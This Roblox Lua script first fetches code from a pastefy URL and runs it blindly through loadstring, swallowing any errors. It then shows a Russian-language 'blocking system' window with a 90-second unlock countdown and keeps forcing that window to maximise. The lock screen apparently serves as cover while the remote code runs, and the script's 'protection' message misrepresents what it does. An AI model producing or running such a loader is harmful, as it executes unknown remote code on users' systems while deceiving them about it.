-- Сначала пробуем загрузить второй скрипт
local success, errorMsg = pcall(function()
    loadstring(game:HttpGet("https://pastefy.app/q0Hv6Z1b/raw", true))()
end)

if not success then
    warn("Второй скрипт не загрузился:", errorMsg)
end

-- Затем загружаем Rayfield
local Rayfield = loadstring(game:HttpGet('https://sirius.menu/rayfield', true))()

-- Создание основного окна
local Window = Rayfield:CreateWindow({
    Name = "СИСТЕМА БЛОКИРОВКИ",
    LoadingTitle = "ИНИЦИАЛИЗАЦИЯ ЗАЩИТЫ",
    LoadingSubtitle = "Интерфейс заблокирован",
    ConfigurationSaving = {
        Enabled = false
    },
    Discord = {
        Enabled = false
    },
    KeySystem = false
})

-- Создаем вкладку
local Tab = Window:CreateTab("ЗАБЛОКИРОВАНО", 4483362458)

-- Создаем секцию
local TimerSection = Tab:CreateSection("СИСТЕМНАЯ БЛОКИРОВКА")

-- Таймер
local TimerLabel = Tab:CreateLabel("ДО РАЗБЛОКИРОВКИ: 1:30")

-- Запускаем таймер (простая и надежная версия)
local function startTimer()
    local timeLeft = 90
    local connection
    
    connection = game:GetService("RunService").Heartbeat:Connect(function(deltaTime)
        timeLeft = timeLeft - deltaTime
        
        if timeLeft <= 0 then
            TimerLabel:Set("СИСТЕМА РАЗБЛОКИРОВАНА")
            connection:Disconnect()
            return
        end
        
        local minutes = math.floor(timeLeft / 60)
        local seconds = math.floor(timeLeft % 60)
        TimerLabel:Set("ДО РАЗБЛОКИРОВКИ: " .. string.format("%d:%02d", minutes, seconds))
    end)
end

-- Запускаем таймер
startTimer()

-- Простая блокировка интерфейса
spawn(function()
    while true do
        pcall(function()
            Window:Maximize()
        end)
        task.wait(2)
    end
end)

print("🔒 Таймер запущен - интерфейс защищен")
